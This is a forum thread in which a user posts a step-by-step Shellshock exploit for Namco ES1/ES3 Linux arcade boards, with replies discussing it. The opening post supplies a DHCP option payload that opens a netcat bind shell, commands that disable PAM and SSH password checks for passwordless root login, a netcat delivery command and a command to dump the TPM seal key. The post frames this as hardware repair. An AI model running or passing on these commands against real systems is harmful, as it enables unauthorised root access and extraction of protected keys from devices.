Public Domain Namco ES1/ES3 (Linux) full access for easy repair (brick, change gpu, broken hdd etc.)

[Jackalus]

Everyone loves a backstory:
It was a rainy evening in Finland and I had just gotten this PCB, me and friend were brain storming various ways to get in. We tried almost all known tricks and linux tricks but nothing worked.

Until that is my friend Mr. xxx woke me up in the morning and telling he owned it. Of course I was like "sure man", plz tell me more. But he really did figure this out in less than 24 hours.

Come on man, cut to the chase:

Here are the details for the linux (not windows, even tho I have that exploited too) version of ES1/ES3 exploit.

With this method you can "remarry" new HDD to the system, repair broken systems to replace parts or even change game files yourself.

To remarry and other stuff, I can write about that later. But now off to exploit.

Not intended for piracy purposes!

NOTE:
UNDER NO CIRCUMSTANCES SHOULD YOU CONNECT ES1 HDD TO WINDOWS PC, IT WILL BRICK.
Use standalone USB dock with 2 SATA connectors to clone it and then use the cloned hdd to dump the games or linux machine if you want to change the original HDD itself.
If you have connected the HDD to windows PC, DO NOT BOOT IT ON THE PCB OR IT WILL SUICIDE!!!!!!!!!!!!!!!!!!!!!!!!

Known games:
- Tank Tank Tank
- Dead Heat
- Dead Heat Riders
- Nirin

Requirements:
- some linux knowledge (all tho possible also with Windows, but Linux is far easier)
- ES1/ES3 motherboard with Linux
- Network cable
- VM or dedicated linux machine.

Steps:
1. Install dhcpd on linux machine (Disable all other DHCP in the network if you use for example a router)
2. Edit/add in dhcpd config: (You can limit the DHCP to the ES1 machines MAC too if you want to safe)
option domain-name "() { :;}; /bin/nc -lp23 -c/bin/sh&";
3. Put this in a new local file:
sed -i 's/nullok_secure$/nullok/' /etc/pam.d/common-auth
sed -i 's/.*PermitEmptyPasswords.*/PermitEmptyPasswords yes/' /etc/ssh/sshd_config
/etc/init.d/ssh restart
4. Connect RJ45 cable to ES1 and your PC
5. Boot the system. Once it's pingable,
cat <thatfile> | nc -q1 <192.168.X.X> 23
5. Profit and login as root via putty/ssh or similar without password. 8)

Proper explanation of the exploit:
http://blog.trendmicro.com/trendlabs-se ... -via-dhcp/

Note:
- Some systems you have like 10 second window to execute the exploit as they shutdown all network connections. You need to quickly connect and dump the TPM key with command (to mount it on other linux machine See note!!!!!!!!!!!)
arcadeunsealkey /etc/arcade/sealkey

Credits:
- android for the PCB
- Mr. xxx who didn't want his real name/nick revealed.

Exploit was found on: 11th, June of 2015

Enjoy

[Asure]

Nice one. Rule #1 is _always_ deny physical access otherwise everything can be pwned.

Does the ES1/ES3 ship with a copy of netcat on its internal hdd? If so, great design decisions from Namco

If it didn't there is plenty of ways i see now to get it into /bin or stuff a copy into tmp and running it. But a nice one-liner to manipulate /etc/inetd.conf (if it exists) might also get good results.

Does the dhcpc run as root?I don't have this system to play around with

[Jackalus]

Nice one. Rule #1 is _always_ deny physical access otherwise everything can be pwned.

Does the ES1/ES3 ship with a copy of netcat on its internal hdd? If so, great design decisions from Namco

If it didn't there is plenty of ways i see now to get it into /bin or stuff a copy into tmp and running it. But a nice one-liner to manipulate /etc/inetd.conf (if it exists) might also get good results.

Does the dhcpc run as root?I don't have this system to play around with

You cannot even manipulate 1 byte off the HDD or the TPM regs are different and it doesn't mount the game. So this is the only proper way to get in

[purplec]

Do you have Star Wars?

[skate323k137]

Shellshock to open a listening socket... Brilliant. I have a feeling that exploit will plague embedded linux sysems for many years to come.

[Jackalus]

Do you have Star Wars?

Not yet. I however have many other ES1/ES3 titles